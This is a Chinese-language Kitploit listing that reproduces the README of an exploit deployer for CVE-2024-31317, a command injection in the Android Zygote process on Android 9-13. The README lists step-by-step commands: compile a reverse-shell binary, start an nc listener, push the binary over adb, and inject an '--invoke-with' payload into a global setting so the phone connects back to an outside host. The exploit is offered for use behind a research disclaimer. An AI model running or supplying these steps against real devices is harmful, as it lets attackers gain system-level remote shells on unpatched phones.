Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-31317-Deployer — CVE-2024-31317 Android Zygote命令注入漏洞研究与部署工具 | Android 9-13 漏洞利用框架 | Kitploit
工具/GitHubGitHub/fcy10012/cve-2024-31317-deployer
Android安全漏洞分析漏洞利用命令与控制学习与教育Payload 开发二进制利用
GitHubfcy10012/cve-2024-31317-deployer

CVE-2024-31317-Deployer

CVE-2024-31317 Android Zygote命令注入漏洞研究与部署工具 | Android 9-13 漏洞利用框架

查看仓库
6228个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-31317 Deployer

License Android Status

🔒 安全研究声明

本项目仅用于安全研究和教育目的。使用本工具进行未经授权的测试是非法的。作者不对任何滥用或损害负责。

📋 概述

CVE-2024-31317 是一个影响 Android 9 至 Android 13 设备的严重安全漏洞,允许具有 WRITE_SECURE_SETTINGS 权限的应用程序通过命令注入获得系统级权限执行。

本项目提供了该漏洞的详细技术分析、概念验证代码以及自动化部署工具。

✨ 主要特性

  • 📱 支持 Android 9-13 全版本
  • 🛠️ 自动化部署脚本
  • 🔄 反向 Shell 连接
  • 📊 详细的技术文档
  • 🎯 模块化设计

🐛 漏洞详情

  • CVE ID: CVE-2024-31317
  • 漏洞类型: 命令注入
  • 严重等级: 高危 (High)
  • CVSS 评分: 7.8
  • 影响组件: Android Zygote 进程
  • 修复状态: 已在 2024年6月 Android 安全补丁中修复

🎯 影响范围

受影响版本

  • ✅ Android 9-13

不受影响版本

  • ❌ Android 14+ (已修复)
  • ❌ 已安装 2024年6月 或更新安全补丁的设备

📁 项目结构

root@kitploit:~
CVE-2024-31317-Deployer/
├── README.md
├── LICENSE
├── VULNERABILITY_ANALYSIS.md
├── reverse_shell.c
├── compile.sh
├── payloads/
├── scripts/
└── docs/

🚀 快速开始

1. 克隆项目

root@kitploit:~
git clone https://github.com/fcy10012/CVE-2024-31317-Deployer.git
cd CVE-2024-31317-Deployer

2. 编译 Payload

root@kitploit:~
chmod +x compile.sh
./compile.sh

3. 部署

root@kitploit:~
# 启动监听器
nc -lvnp 4444

# 推送并执行
adb push bin/reverse_shell_arm64 /data/local/tmp/reverse_shell
adb shell chmod 755 /data/local/tmp/reverse_shell

# 注入payload
adb shell settings put global hidden_api_blacklist_exemptions "L*\n--invoke-with /data/local/tmp/reverse_shell 192.168.1.100 4444"

# 触发漏洞
adb shell stop && adb shell start

📚 文档

  • 深度技术分析
  • Payload 使用说明
  • 完整使用教程

⚠️ 免责声明

本项目仅供安全研究和教育目的使用。使用本工具即表示您同意:

  • 遵守所有适用的法律法规
  • 仅用于合法的安全研究
  • 对您的行为负全部责任

📜 许可证

本项目采用 MIT 许可证 - 详见 LICENSE 文件

👨‍💻 作者

fcy10012 - GitHub

🙏 致谢

参考项目: WebLDix/CVE-2024-31317-PoC-Deployer


⭐ 如果这个项目对您有帮助,请给它一个星标!

下载工具